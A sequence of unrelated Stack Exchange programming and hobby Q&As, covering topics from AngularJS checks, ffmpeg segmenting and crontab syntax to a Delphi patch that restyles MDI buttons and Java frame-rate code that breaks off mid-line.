Does a $p$-form eat $p$-vectors or $p$ number of vectors? A bilinear form is another term for a $2$-form. So does it eat $2$ distinct vectors or a single $2$-vector?

Either. Both. After all, you can take $p$ vectors and wedge them together to get a $p$-vector.

Given that you have used the [tag:exterior-algebra] tag, do you want to talk about skew forms?

Sure. No idea what they are, but I am eager to learn as much as I can.

Bilinear forms, like quadratic forms, are not in an exterior algebra... unless $b(v,w)=-b(w,v)$... in which case you can write $b$ as a wedge product of one-forms.

@JamesS.Cook I'm confused as to the second part of your comment; I think you mean a linear combination of wedges if you intend that identity to be true for all $v,w$, since $\Lambda^k\left(\Bbb R^n\right)$ is only generated by the $k$-blades.

@AdamHughes Good point. I do mean to say a linear combination of wedge products.

To elaborate on Zhen Lin's comment: either viewpoint of a bilinear form is okay due to the universal property of the tensor product. Given a vector space $V$ with field of scalars $k$, I've usually seen a bilinear form defined as a bilinear map $B : V \times V \to k$, so a function that eats two vectors, as in your first definition. However, by the universal property of the tensor product, there is a unique linear map $\tilde{B} : V \otimes_k V \to k$ such that $B = \tilde{B} \circ \pi$, where $\pi$ is the map $\pi : V \times V \to V \otimes_k V$, $(v_1, v_2) \mapsto v_1 \otimes v_2$. So $\tilde{B}$ eats $2$-vectors, as in your second definition. Since this association $B \leftrightarrow \tilde{B}$ is a bijection, we can in a sense identify $B$ and $\tilde{B}$ and are thus free to think of a bilinear form as a map $V \times V \to k$ or $V \otimes_k V \to k$. For more on this, see section 10.4 of Dummit and Foote.
A bilinear form on a vector space $V$ over a field $\Bbb{F}$ is a bilinear map $B:V\times V\to \Bbb{F}$ which eats a pair of vectors to give a scalar according to $(v,w)\mapsto B(v,w)$. This can be generalized.
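To make the two viewpoints concrete, here is a small LaTeX sketch in the notation above; the specific form chosen (the dot product on $k^2$) is an invented example, not one from the thread:

```latex
% The two equivalent pictures of one bilinear form (example: the
% dot product on $V = k^2$):
%
% as a bilinear map on pairs of vectors,
\[
  B : V \times V \to k, \qquad B(v, w) = v_1 w_1 + v_2 w_2,
\]
% and as a linear map on the tensor product,
\[
  \tilde{B} : V \otimes_k V \to k, \qquad
  \tilde{B}(v \otimes w) = v_1 w_1 + v_2 w_2,
\]
% related by $B = \tilde{B} \circ \pi$, where
% $\pi(v, w) = v \otimes w$.
```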
common-pile/stackexchange_filtered
Compiling LINQ expressions I'm wondering what steps the (v3+) compiler takes to build LINQ expressions for methods that take an expression argument. In particular, does the compiler use, or share logic with, LeafExpressionConverter? (That could require first generating an Expr then converting it.) If there is a separate mechanism, is anything done to ensure parity with LeafExpressionConverter? Yes, I believe that it uses LeafExpressionConverter.QuotationToLambdaExpression. Search for quote_to_linq_lambda_info in the open source compiler code base. Found it. Thanks.
common-pile/stackexchange_filtered
Symfony 3.0.1 EventDispatcher I'm writing a RequestListener and I would like to get the EventDispatcher. It was working in a previous version of Symfony. I checked the CHANGELOG.md : The method getListenerPriority($eventName, $listener) has been added to the EventDispatcherInterface. The methods Event::setDispatcher(), Event::getDispatcher(), Event::setName() and Event::getName() have been removed. The event dispatcher and the event name are passed to the listener call. public function onKernelRequest(GetResponseEvent $event) { $dispatcher = $event->getDispatcher(); } How can I get the event dispatcher? Thanks Read: "The event dispatcher and the event name are passed to the listener call." Do you have an example of how to use this? The answer below (by @Cerad) is 100% correct. Take a look. ;) I've just tried it and it works, thanks. http://symfony.com/doc/current/components/event_dispatcher/introduction.html#eventdispatcher-aware-events-and-listeners public function onKernelRequest( GetResponseEvent $event, $eventName, EventDispatcherInterface $dispatcher) { }
common-pile/stackexchange_filtered
How to check ng-model variable value undefined using ng-change? If no value is selected for the ng-model selectedFileSize, it's throwing the error TypeError: Cannot read property 'size' of undefined when I click the startRecording button. How can I resolve this problem? main.html <div class="col-md-3"> <select class="form-control" ng-model="selectedFileSize" ng-options="item as item.value for item in FileSizeOptions" ng-change="onSizeChange()"><option value="">Select</option></select> </div> <div class="col-md-2"> <button type="button" class="btn btn-primary" ng-click="startRecording()">Start Recording</button> </div> ctrl.js if (($scope.selectedFileSize.size !== "") || ($scope.selectedFileSize !== undefined)) { //logic here } Can you show us more of how you instantiated the selectedFileSize object? It sounds like selectedFileSize is still undefined at this point. You need to check that selectedFileSize is populated before checking selectedFileSize.size: if ($scope.selectedFileSize && $scope.selectedFileSize.size) { //logic here } perfect it worked that's what i was looking for, Thank you boss!
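The same guard works outside Angular too. A plain-JavaScript sketch (the function and object names are invented for illustration):

```javascript
// Reading a property of undefined throws, so guard the object first.
function sizeOf(selected) {
  // `selected && selected.size` short-circuits: if `selected` is
  // undefined (nothing chosen yet), `.size` is never touched.
  if (selected && selected.size) {
    return selected.size;
  }
  return null; // nothing selected, or size not set
}
```

With this guard, `sizeOf(undefined)` returns `null` instead of throwing `TypeError: Cannot read property 'size' of undefined`.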
common-pile/stackexchange_filtered
Printing Reports and invoices with Ruby? I'm just learning Ruby, and I wonder how to generate reports and invoices (with logo, address field, footer, a variable number of invoice items (sometimes resulting in more than one page), carry-over of the amount to pay from one page to the next, free-floating 2-column text (left-and-right-justified) below the resulting payment information). Currently I get a canvas to print and draw on from the operating system (matching the printer specifications) and use some draw-, move-, line-, text- and formfeed-API functions and do some heavy calculations for textblock moving (a bit TeX-like). How would this be done in Ruby? Building an .odt and throwing it at OpenOffice, or a .tex and throwing it at LaTeX? Or are there any free libraries that do all these kinds of things for me, so I only have to feed in the relevant parts and let Ruby do the text formatting? EDIT: To be more specific: I want to put a corporation logo on the first page (DIN A4 format, but may also be letter) at a specific position, also the footer on every page and the address box on the first page. All the rest should be free-floating text blocks with left-right justification, and bold words in the middle of texts. Something like pdf.column.blocktext("Hello Mr. P\nwe have [b]good news[/b] for you. bla bla bla and so on. Please keep this text together (no page break)..."); pdf.column.floatingblock("This is another block, that should be printed, and can be broken over more than one column..."); which should render the text in the corporate font on the paper, justified, and wrapping neatly to the next column/page if it reaches the bottom of the page. Thinking about it, this is exactly what LaTeX is for. I suggest you consider PDF generation. In Rails, it's pretty simple with the Prawn library. There is also a fresh new Railscast about that. Official web site.
Thanks, that may be the right way; I just do not see the block-text functionality (like justification, i.e. Blocksatz), but I will take some further looks. You could also check out HtmlDoc for generating PDFs; it just takes in HTML and generates a PDF from it. This approach is nice because it lets you very easily reuse a partial for an on-screen and hard-copy invoice. http://blog.adsdevshop.com/2007/11/20/easy-pdf-generation-with-ruby-rails-and-htmldoc/ link is 404 and from 2007 The Ruport library (Ruby Reports) makes it pretty easy to spit report tables out in multiple formats, including PDF. There's also an ActiveRecord hook, acts_as_reportable, that gives your models a reporting interface.
common-pile/stackexchange_filtered
ffmpeg increases video segments length when used with -segment_time - how to fix? I am trying to record an rtmp stream to file, splitting every 10 seconds. My ffmpeg command is: ffmpeg -i rtmp://<IP_ADDRESS>:1935 -f segment -strftime 1 -segment_time 10 -segment_format avi E:\record\CAM1_%Y-%m-%d_%H-%M-%S.avi It works, but the created files are getting corrupted in some way. The first file is OK, length 10 sec; the second file's length is 20 sec, and the first 10 seconds are a static image; the third file is 30 sec, and the first 20 seconds are nothing but a static image, and so on. What am I doing wrong? AVI doesn't work with PTS, so you'll have to reset timestamps: ffmpeg -i rtmp://<IP_ADDRESS>:1935 -f segment -strftime 1 -reset_timestamps 1 -segment_time 10 -segment_format avi E:\record\CAM1_%Y-%m-%d_%H-%M-%S.avi
common-pile/stackexchange_filtered
Windows command line compression/extraction tool? I need to write a batch file to unzip files to their current folder from a given root folder.

Folder 0
|----- Folder 1
|      |----- File1.zip
|      |----- File2.zip
|      |----- File3.zip
|      |----- Folder 2
|             |----- File4.zip
|
|----- Folder 3
       |----- File5.zip
       |----- FileN.zip

So, I wish that my batch file is launched like so: ocd.bat /d="Folder 0" Then, make it iterate from within the batch file through all of the subfolders to unzip the files exactly where the .zip files are located. So here's my question: Does Windows (XP at least) have a command-line interface for its embedded zip tool? Otherwise, shall I stick to another third-party util? AFAIK, there is no unzip tool shipped as part of Windows XP, but there is GNU unzip, which will do the job nicely for you. I've been told that there was a compression util embedded in Windows XP called compress.exe. Compress doesn't know how to do anything with ZIP files, and is not available in all versions of XP. If you need unzip functionality, you will need a 3rd-party EXE. I have finally decided to use 7za.exe, which is the command line version of 7-Zip.
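A minimal batch sketch of the recursive part (untested here; it assumes 7za.exe is on the PATH, and the /d= flag parsing is simplified to a plain positional argument):

```batch
@echo off
rem Usage: ocd.bat "Folder 0"
rem Recurse from the given root; for each .zip found, extract it
rem into the folder it sits in (%%~dpf expands to the file's drive+path).
for /r "%~1" %%f in (*.zip) do (
    7za.exe x "%%f" -o"%%~dpf" -y
)
```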
common-pile/stackexchange_filtered
Prevent parent underline from underlining child element Given this pared-down test case: <!DOCTYPE html> <html><head><title>No Underline Please</title> <style type="text/css"> li { text-decoration:underline } li .rule { text-decoration:none ! important } </style> </head><body> <ol><li><span class="rule">RULE</span> CONTENT</li></ol> </body></html> I want to underline CONTENT but not underline RULE. However, Chrome, FF, and IE9 all underline RULE. Presumably this is standards-compliant behavior, given that they all agree. What spec am I forgetting that is preventing me from overriding the text-decoration? How can I achieve the result I want? Fiddle here: http://jsfiddle.net/F3Grr/ http://stackoverflow.com/questions/4481318/css-text-decoration-property-cannot-be-overridden-by-ancestor-element/4481356#4481356 The entire li element is being underlined. The li .rule rule is being applied, but the underline belongs to the entire list item. You should wrap the content you want to be underlined inside another inline element. Here's one example: <!DOCTYPE html> <html><head><title>No Underline! You're welcome.</title> <style type="text/css"> li span.emphasis { text-decoration:underline; } </style> </head><body> <ol><li>RULE <span class="emphasis">CONTENT</span></li></ol> </body></html> Thanks, I just realized the same thing. I'll accept your answer in 9 minutes if you change the class name to not describe the visual style being applied. ;) Haha, but you're ok with me indenting like that? Illustrative code differs from production code, imho. Note that while your answer (wrap the content you want to underline) is the correct workaround for this problem, as shown by this test we can see that text-decoration accumulates on descendants (rather than being inherited by them). 
Also interesting to note is this comment: "Firefox versions up to and including 3.5; Safari up to and including version 4; Chrome up to and including version 3; all propagate text decoration values to floating descendants." Even the modern browsers are not properly honoring the specs.
common-pile/stackexchange_filtered
Change all products to have the same shipping class within Woocommerce I've got a woocommerce shop with 1000+ products in it; however, I've noticed that random products have no shipping class applied to them. So when customers get to the checkout, these items cause issues with shipping calculations. Is there any way to show a list of products with no shipping class, or change all products in the shop to the same shipping class, without going through each product individually? I know I could use bulk actions to change them all, but there are 25+ pages, even when I change the number of products shown. This should change the shipping class of all published products. Updated answer Just remembered about the fields parameter, so this is the new code: $shipping_class_slug = 'your-shipping-class-slug'; // get just the IDs of all products published $products = new WP_Query( array ( 'post_type' => 'product', 'posts_per_page' => -1, 'fields' => 'ids' )); // for each product change the shipping class foreach ( $products->posts as $pID ) { wp_set_object_terms( $pID, $shipping_class_slug, 'product_shipping_class' ); } Old answer $shipping_class_slug = 'your-shipping-class-slug'; // get all products published $products = new WP_Query( array ( 'post_type' => 'product', 'posts_per_page' => -1 )); // retrieve products IDs $productsIDs = wp_list_pluck( $products->posts, 'ID' ); // for each product change the shipping class foreach ( $productsIDs as $pID ) { wp_set_object_terms( $pID, $shipping_class_slug, 'product_shipping_class' ); } You can wrap it in a function (in your functions.php file) to call with an action. Remember to change 'your-shipping-class-slug' with the one you want. And most of all: DO A BACKUP before you try anything! ;) (better: clone the website locally and try there first)
common-pile/stackexchange_filtered
Home-brew 10 meter walkie talkies? "When I was in high school, we had 8 hams at once. (Probably rare) 4 of us built little 10 meter walkie-talkies and had great fun using them on Field Day, hiking or around town. It was especially fun because this was pre-cellphone and ordinary non-ham folks could not buy any kind of walkie-talkie. We were hi-tech and really cool. Now the average kid has unused Radio Shack talkies in his dresser and couldn't care less about them." That is from the author of Crystal Sets to Sideband. Now I'm in the generation of the "Radio Shack unused walkie talkies" and I want to build myself a 10 meter walkie talkie. I have fairly decent soldering skills and I have been building electronics for about 5 years (I probably started when I was 10). How can I build a 10 meter handheld, and what parts do I need? I would like to get transistors, inductors, etc. and build the whole thing with discrete components (no ICs). Related: Can a licensed ham use or modify CB equipment to work the 10 Meter Amateur bands? Remember that those old ones were limited to 100 mW. It is fun to be nostalgic, but that is only good enough for a big yard. FRS radios can go much further. But I admire your "build it myself" spirit. I built my first 80 meter CW transmitter on the top of a cigar box with coils wound on my aunt's hair curlers and a couple of transistors. Those were the days, my friend. More to your point, I recently bought a pair of those old-style CB handhelds like I had when we were kids in the 60s. These are much smaller, and they have reminded me of one part I had forgotten: They have no squelch. ;-) On the flip side, I also remember busy signals. When was the last time you heard one of those? 
The times, they are a-changin' I am not sure if you are asking about converting a CB walkie-talkie to 10m or building one from scratch, so I will address both, not feeling like working at the moment: Converting a CB walkie-talkie What it will take to convert a CB walkie-talkie is going to depend on how it's constructed, of course. It can be as simple as replacing one or more crystals. A cheap one will have one offset crystal to move the channels up into the CB range. Fancier ones might have several crystals. Basically you want to move it "up" 2MHz to get you into about 29MHz. You'll be stuck with the channel concept on the frequencies of the crystals, of course, but that can be OK. A newer CB will probably have some sort of DDS which would make it much much harder to convert. As a note, CB radios are (usually) AM, and while this is fine on 10m, that's something to remember. Newer ones support SSB as well, but might be much more difficult to mod. If you want to get crazy you can figure out how to suppress the carrier and do DSB, or suppress both the carrier and the lower sideband. Even more adventurous would be to disconnect the AM modulator, add an FM detector chip (I know you want discrete, but this is just blue sky stuff) and modulate the VCO; then you'd be doing FM. Although these days most repeaters have a PL, which makes this mod a lot less useful. Homebrew 10m walkie-talkie Poking around on the net, there are a bunch of QRP 10m transceivers that could be built into a walkie-talkie form factor. This one looks pretty doable: The only IC is a small op-amp for the audio out. Looking the schematic over, it's set up for 220V AC power (the author is Australian, but he's probably OK despite that :) ). Since you are going to want to run on battery, you can axe that whole section and wire the DC source right in. Another option is a 14MHz SSB transceiver. This page details an all-discrete-component version that will run on battery power. 
You can either roll with it on 20m or convert it up to 10m. Happy Soldering. The only HT kit I've ever seen in my searches was the "TJ2B MK2 5 Band SSB Handheld Transceiver" from Youkits. From Youkits themselves: TX/RX: 5-21MHz, covering 60m, 40m, 20m, 17m and 15m band (No TX on 30m) So it won't work on the 10m band, but it will work on 5 other bands. However WB8YQJ's eHam review says this: The new TJ2B "Kit B" seemed ideal, offering 14Mhz to 30Mhz SSB +(CW Receive) in a handheld case and $269 plus ship. The TJ2B shows sold out on the YouKits web site, and the last update there is from 2015 (i.e. answer is now obsolete). Further, they apparently only sell "fully assembled and tested" products now. About as simple as a half-watt can get. What's the source of this schematic? Check out the ham swapmeets for a used AEA 10 meter DX handy; I picked up one at the Williams, AZ hamfest for $100. Very well made; worked several states including Hawaii. Converting a CB walkie-talkie would not be that worthwhile, as these radios operate in AM mode. My honest opinion: I would avoid the radios made in China, as I feel their quality control is not that good, and if the radio is defective, where will you get it fixed? Ship it back to China? The Japanese radios are far better made! Check out the portable FT-817ND The question was about home-brew how-to, not for a product recommendation. The best little book you can get yourself is How to Make Walkie-Talkies, a Bernard Babani book by F. G. Rayer. It is simple and you can make everything yourself for 27 MHz and 28 MHz TX and RX, wind your own coils, etc., and using ordinary transistors build a few of the circuits great for experimenting with. Also for more serious stuff, books are in French but circuits are good: a set of 4 or more books by Pierre Duranton on CB and ham radio, Émetteurs - récepteurs, Walkies - talkies. All make-it-yourself stuff including details of making chokes etc. Best books around. 
I collected them all over the years and made my first walkie talkies at the age of 11. 50 mW 27 MHz single-channel 7-transistor AF115/OC71 types worked OK; short range, but they got me into electronics and I'm still going at 58. Enjoy. This isn't really answering the question. It's better to include at least some of the material when referencing such sources, because it can sometimes become obsolete otherwise.
common-pile/stackexchange_filtered
How to schedule a shell script using crontab I want to schedule a shell script to run every day except Sunday at 7:30 pm using crontab. Can you please help? Check this tool, it will help you to build the crontab line: http://www.corntab.com/pages/crontab-gui Quick answer (cron uses a 24-hour clock, so 7:30 pm is 19:30, and days 1-6 are Monday through Saturday): 30 19 * * 1-6 /your/command/to/run
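For 7:30 pm every day except Sunday, the five crontab fields spell out as follows (a commented sketch; /your/command/to/run is a placeholder):

```
# minute  hour  day-of-month  month  day-of-week  command
# 30      19    *             *      1-6          (1-6 = Mon-Sat, skips Sunday)
30 19 * * 1-6 /your/command/to/run
```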
common-pile/stackexchange_filtered
Ruby on Rails uncapitalize first letter I'm running Rails 2.3.2. How do I convert "Cool" to "cool"? I know "Cool".downcase works, but is there a Ruby/Rails method that does the opposite of capitalize, i.e., uncapitalize or decapitalize? There is no inverse of capitalize, but you can feel free to roll your own: class String def uncapitalize self[0, 1].downcase + self[1..-1] end end Where should we add this method? @Vadorequest The method? Add it on the String class, as shown in the answer. In a standard Rails app, it would probably make sense to add it to a new file in /config/initializers @Ajedi32 Well, it maybe looks obvious to you, but not to me. Thanks Dave. There is also: "cool_cat".camelize(:lower) # => "coolCat" This does require ActiveRecord tho : http://apidock.com/rails/String/camelize (After reading the question, it does state it is already with Rails) @Ian Vaughan: ActiveSupport to be more precise They updated the method signature around v4.2.7. It now takes a boolean, like camelize(uppercase_first_letter = true) http://apidock.com/rails/v4.2.7/String/camelize @animatedgif there are two methods: Inflector#camelize(term, uppercase_first_letter), which takes a string to camelize and a boolean, and String#camelize(first_letter), which camelizes self and takes a symbol :upper or :lower. I think the apidock docs are in error. Definitely a rails thing but damn it's nice to have! You could also do this with a simple sub: "Cool".sub(/^[A-Z]/) {|f| f.downcase } note that "Cool".sub(/^[A-Z]/, &:downcase) is enough "CoolTrick".sub(/^[[:alpha:]]/) {|f| f.downcase } str = "Directly to the south" str[0] = str[0].downcase puts str #=> "directly to the south" This is not only the most readable method, but also by far the most performant one, even if you protect it by some kind of ternary operator or if statement to ensure that str is not nil. This should be the accepted answer. Thanks @boulder_ruby There is no real inverse of capitalize, but I think underscore comes close. 
"CoolCat".underscore #=> "cool_cat" "cool_cat".capitalize #=> "Cool_cat" "cool_cat".camelize #=> "CoolCat" Edit: underscore is of course the inverse of camelize, not capitalize. You can use tap (so that it fits on one line): "JonSkeet".tap { |e| e[0] = e[0].downcase } # => "jonSkeet" String#downcase_first (Rails 7.1+) Starting from Rails 7.1, there is a String#downcase_first method: Converts the first character to lowercase. For example: 'If they enjoyed The Matrix'.downcase_first # => "if they enjoyed The Matrix" 'I'.downcase_first # => "i" ''.downcase_first # => "" Sources: String#downcase_first. ActiveSupport::Inflector#downcase_first. Add String#downcase_first method. There is an inverse of capitalize called swapcase: "Cool Cat".swapcase #=> "cOOL cAT" If you use Ruby Facets, you can lowercase the first letter: https://github.com/rubyworks/facets/blob/master/lib/core/facets/string/uppercase.rb name = "Viru" name = name.slice(0).downcase + name[1..(name.length)] Try this 'Cool'.sub(/^([A-Z])/) { $1.tr!('[A-Z]', '[a-z]') } https://apidock.com/ruby/XSD/CodeGen/GenSupport/uncapitalize
common-pile/stackexchange_filtered
Send plain text email using EmailModel? I currently have a plugin that's successfully sending email using EmailModel(). The problem is: it's sending a multi-part email with HTML and plain text components. For this particular email, it would be best if I could just send the plain text portion. Is there a way to disable the HTML segment when sending via EmailModel()? Currently not. If Craft sees that there isn't anything specified for the htmlBody property of EmailModel, it will run the body property through Markdown and set that as htmlBody. Ok, good to know. I've managed to get a minimal version of the HTML working as expected, so it probably won't be too bad. Thanks for the confirmation, though! I see this is still the case. It's actually a real pain not being able to send plain text emails. I'm having to roll back to php mail() to get the job done for my purpose. @JamesNZ You should consider thumbs-upping/leaving a comment here: https://github.com/craftcms/cms/issues/1107
common-pile/stackexchange_filtered
Nerve parasite in short story The short story I refer to began with a cave-in, collapse, or other type of mass accident where only one person lived. The parasite jumped from its dying host into that last living person. I'm a little unclear on details beyond this point, but the new host was rescued. It turns out he was already suffering from a terminal disease. He did battle with the parasite to the point of ending his life in isolation so it would have nowhere to go. I sure would like to read it again! A little more detail that might help: the guy was a doctor, I think. Anyway, he had good physiological knowledge. He was able to use this to surgically thwart the parasite trying to control his body as he took his life. The mental/physical battle was short in duration but VERY well developed in the story. I read it about 12 years ago. I thought it was Stephen King, but haven't been able to [re]find it. Take a look at this guide to help jog your memory and [edit] any more details. Also, take a look at our [tour] to get a better understanding of our site and earn your first badge! Some plot resemblance to the movie Fallen, but doesn't seem to be a match. This is "The Autopsy" by Michael Shea. The alien parasite is found in the body of a miner who died in a mine collapse by the doctor doing the autopsy. As you say, the doctor has cancer, and deals with the parasite by allowing it to infect him and then committing suicide. The story can be read in its entirety at the Internet Archive. This story was also the unaccepted answer to this old question: Story identification: medical examiner vs. alien parasite
common-pile/stackexchange_filtered
TActionMainMenuBar, VCL Styles and MDI buttons (Minimize, Close, etc.) not being styled. I'm trying to make TActionMainMenuBar display styled MDI buttons like a TMainMenu does. Any suggestions? I can't stop using MDI for this project. You could always stop using VCL styles... MDI was spawned with the idea of a single parent window hosting multiple instances of the same class of "document"; Frames allow you to do just that without the unnecessary hassle for the developer and the user. Can you include sample code to reproduce the issue? @RRUZ, in the IDE create a new MDI application, add an ActionManager & ActionMainMenuBar to the main form, use VCL Styles, run the project and cascade a new child form. @RRUZ As Peter Vonča said. But you need to maximize the child window. Ok, first, this is not a VCL Styles bug, this is a VCL bug. The issue appears even if VCL Styles are disabled. The issue is located in the TCustomMDIMenuButton.Paint method, which uses the old DrawFrameControl WinAPI function to draw the caption buttons.

procedure TCustomMDIMenuButton.Paint;
begin
  DrawFrameControl(Canvas.Handle, ClientRect, DFC_CAPTION,
    MouseStyles[MouseInControl] or ButtonStyles[ButtonStyle] or
    PushStyles[FState = bsDown]);
end;

As a workaround you can patch this method using a detour and then implement a new paint method using the StyleServices. Just add this unit to your project. 
unit PatchMDIButtons;

interface

implementation

uses
  System.SysUtils, Winapi.Windows, Vcl.Themes, Vcl.Styles, Vcl.ActnMenus;

type
  TCustomMDIMenuButtonClass = class(TCustomMDIMenuButton);

  TJumpOfs = Integer;
  PPointer = ^Pointer;

  PXRedirCode = ^TXRedirCode;
  TXRedirCode = packed record
    Jump: Byte;
    Offset: TJumpOfs;
  end;

  PAbsoluteIndirectJmp = ^TAbsoluteIndirectJmp;
  TAbsoluteIndirectJmp = packed record
    OpCode: Word;
    Addr: PPointer;
  end;

var
  PaintMethodBackup: TXRedirCode;

function GetActualAddr(Proc: Pointer): Pointer;
begin
  if Proc <> nil then
  begin
    if (Win32Platform = VER_PLATFORM_WIN32_NT) and
       (PAbsoluteIndirectJmp(Proc).OpCode = $25FF) then
      Result := PAbsoluteIndirectJmp(Proc).Addr^
    else
      Result := Proc;
  end
  else
    Result := nil;
end;

procedure HookProc(Proc, Dest: Pointer; var BackupCode: TXRedirCode);
var
  n: NativeUInt;
  Code: TXRedirCode;
begin
  Proc := GetActualAddr(Proc);
  Assert(Proc <> nil);
  if ReadProcessMemory(GetCurrentProcess, Proc, @BackupCode, SizeOf(BackupCode), n) then
  begin
    Code.Jump := $E9;
    Code.Offset := PAnsiChar(Dest) - PAnsiChar(Proc) - SizeOf(Code);
    WriteProcessMemory(GetCurrentProcess, Proc, @Code, SizeOf(Code), n);
  end;
end;

procedure UnhookProc(Proc: Pointer; var BackupCode: TXRedirCode);
var
  n: NativeUInt;
begin
  if (BackupCode.Jump <> 0) and (Proc <> nil) then
  begin
    Proc := GetActualAddr(Proc);
    Assert(Proc <> nil);
    WriteProcessMemory(GetCurrentProcess, Proc, @BackupCode, SizeOf(BackupCode), n);
    BackupCode.Jump := 0;
  end;
end;

procedure PaintPatch(Self: TObject);
const
  ButtonStyles: array[TMDIButtonStyle] of TThemedWindow =
    (twMDIMinButtonNormal, twMDIRestoreButtonNormal, twMDICloseButtonNormal);
var
  LButton: TCustomMDIMenuButtonClass;
  LDetails: TThemedElementDetails;
begin
  LButton := TCustomMDIMenuButtonClass(Self);
  LDetails := StyleServices.GetElementDetails(ButtonStyles[LButton.ButtonStyle]);
  StyleServices.DrawElement(LButton.Canvas.Handle, LDetails, LButton.ClientRect);
end;

procedure HookPaint;
begin
  HookProc(@TCustomMDIMenuButtonClass.Paint, @PaintPatch, PaintMethodBackup);
end;

procedure UnHookPaint;
begin
  UnhookProc(@TCustomMDIMenuButtonClass.Paint, PaintMethodBackup);
end;

initialization
  HookPaint;

finalization
  UnHookPaint;

end.

The result will be

You are welcome, don't forget to report this issue to the QC site http://qc.embarcadero.com/wc/qcmain.aspx
common-pile/stackexchange_filtered
head problem: just two non-adjacent columns please So I was trying to look at a few columns and did head(mydf[76:82], n=20), which got me columns 76:82, for 20 rows. Excellent. Just what I wanted. Next, however, I want to get just columns 76 & 82. I tried the following: head(tu_timeadd[76&82]) #which just gave me the whole dataframe head(tu_timeadd[76,82]) #which I'm pretty sure gave me the value for column 76, row 82? head(tu_timeadd[76 |82]) #which gave me the whole thing again Is there any way to just spit out the first few rows of columns 76 & 82 without having to subset them out? head(tu_timeadd[c(76,82)]) Thanks so much! FYI, [76&82] fails because in R, x&y is a logical operation, and anything non-zero is TRUE, meaning this is interpreted as [TRUE&TRUE] --> [TRUE] --> all data; [76|82] is very much the same issue. [76,82] is row 76, column 82. I suggest you read more on ?[.
common-pile/stackexchange_filtered
Java low FPS on PC comparing to laptop I've just started developing simple 2D game in Java. I splitted update from draw methods. Update refreshes at specific speed of 60fps while drawing is as fast as possible. When I wrote simple FPS counter of draw and send this to friends I discovered that on laptops it has at least 200fps when on PCs it has maximum of 35. I wonder what it may be caused by. Here is Base class: public class Base{ public static boolean isGameRunning; private static Draw d; public static void main(String[] args) { isGameRunning = true; Game g = new Game(); d = new Draw(g); Thread draw = new Thread(d); Thread update = new Thread(new Update(g)); GraphicsEnvironment env = GraphicsEnvironment.getLocalGraphicsEnvironment(); GraphicsDevice gd = env.getDefaultScreenDevice(); JFrame window = new JFrame(); setWindow(window); window.setContentPane(d); gd.setFullScreenWindow(window); g.initialize(); draw.start(); update.start(); } private static void setWindow(JFrame window) { window.setUndecorated(true); window.setResizable(false); window.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); }} And a Draw class here: package basic; import java.awt.*; import javax.swing.JPanel; import main.Game; class Draw extends JPanel implements Runnable { private static final long serialVersionUID = 1L; private Game g; public Color bgColor = Color.BLACK; Draw(Game g) { this.g = g; } public void run() { paintComponent(getGraphics()); while(Base.isGameRunning) { repaint(); } } public void paintComponent(Graphics graph) { try { Graphics2D g2d = (Graphics2D) graph; g2d.clearRect(0, 0, getWidth(), getHeight()); g2d.setColor(bgColor); g2d.fillRect(0, 0, getWidth(), getHeight()); g.draw(g2d); }catch(NullPointerException e) { } } } [EDIT] Here is an update class: package basic; import main.Game; class Update implements Runnable{ private final int FPS = 60; private long targetTime = 1000/FPS; //private Game g; //Update(Game g) //{ //this.g = g; //} public void run() { long start, 
elapsed, wait; while(Base.isGameRunning) { start = System.nanoTime(); //g.update(); elapsed = System.nanoTime() - start; wait = targetTime - elapsed / 1000000; try { Thread.sleep(wait); } catch (InterruptedException e) { e.printStackTrace(); } } } } Some improvement can be done. I tried to change the code as you didn't provide the Update class. import java.awt.GraphicsDevice; import java.awt.GraphicsEnvironment; import javax.swing.JFrame; import javax.swing.SwingUtilities; /** * * @author Pasban */ public class Base { public static boolean isGameRunning; private static Draw d; public static void main(String[] args) { isGameRunning = true; d = new Draw(); Thread draw = new Thread(d); GraphicsEnvironment env = GraphicsEnvironment.getLocalGraphicsEnvironment(); GraphicsDevice gd = env.getDefaultScreenDevice(); JFrame window = new JFrame(); setWindow(window); window.setContentPane(d); gd.setFullScreenWindow(window); //g.initialize(); draw.start(); } private static void setWindow(JFrame window) { window.setUndecorated(true); window.setResizable(false); window.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); } } And import java.awt.Color; import java.awt.Graphics; import java.awt.Graphics2D; import javax.swing.JPanel; /** * * @author Pasban */ class Draw extends JPanel implements Runnable { private static final long serialVersionUID = 1L; public Color bgColor = Color.BLACK; private long timer; private long lastTime; private int FPS; private int FPSLast; public void run() { paintComponent(getGraphics()); this.timer = System.currentTimeMillis(); this.lastTime = 0; this.FPS = 0; this.FPSLast = 0; while (Base.isGameRunning) { repaint(); } } public void paintComponent(Graphics graph) { try { Graphics2D g2d = (Graphics2D) graph; //g2d.clearRect(0, 0, getWidth(), getHeight()); g2d.setColor(bgColor); g2d.fillRect(0, 0, getWidth(), getHeight()); //g.draw(g2d); g2d.setColor(Color.WHITE); long dist = System.currentTimeMillis() - this.timer; if (dist - this.lastTime > 1000) { 
this.lastTime = dist; this.FPSLast = this.FPS; this.FPS = 0; } this.FPS++; g2d.drawString(dist + "ms / " + this.FPSLast + "fps", 50, 50); } catch (NullPointerException e) { } } } Currently the FPS on my old PC is 103 with the above code. The main change I applied is on this line: //g2d.clearRect(0, 0, getWidth(), getHeight()); By enabling this line, the FPS goes down to 70FPS, which means this line itself uses 50+FPS. However, leave it disabled, since you fill the drawing rect right after this command anyway; enabling it means you use your CPU and FPS for no reason and it will have no effect on your drawing canvas. One more improvement can be fixing your FPS by applying Thread.sleep(time) if it is beyond 60+FPS. Or you can skip the repaint call within your while (Base.isGameRunning) loop when it is too early to repaint. I didn't help :/ I have added Update. And have you got any idea why on laptops it seems to work properly? I think you need to check if your graphics card is the same as your friend's. If you compare the device features, you will find the reason. I don't have an external graphics card but, when I had one, graphical processes ran much faster. It is obvious that instead of accessing your main RAM, it accesses its own RAM, which is faster. That is what I think. Maybe someone else has a better explanation.
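One pitfall in the Update class worth noting alongside the Thread.sleep suggestion: on a slow frame, targetTime - elapsed / 1000000 goes negative, and Thread.sleep throws an IllegalArgumentException on a negative argument. A minimal sketch of a clamped frame-cap helper (class and method names are mine, not from the thread):

```java
// Sketch of a frame-cap helper (class/method names are mine): given how long
// a frame took, compute how long to sleep to hold a target FPS, clamped so
// Thread.sleep never receives a negative argument.
public class FrameCap {

    public static long sleepMillis(long frameNanos, int targetFps) {
        long targetMillis = 1000L / targetFps;        // ~16 ms per frame at 60 FPS
        long wait = targetMillis - frameNanos / 1_000_000L;
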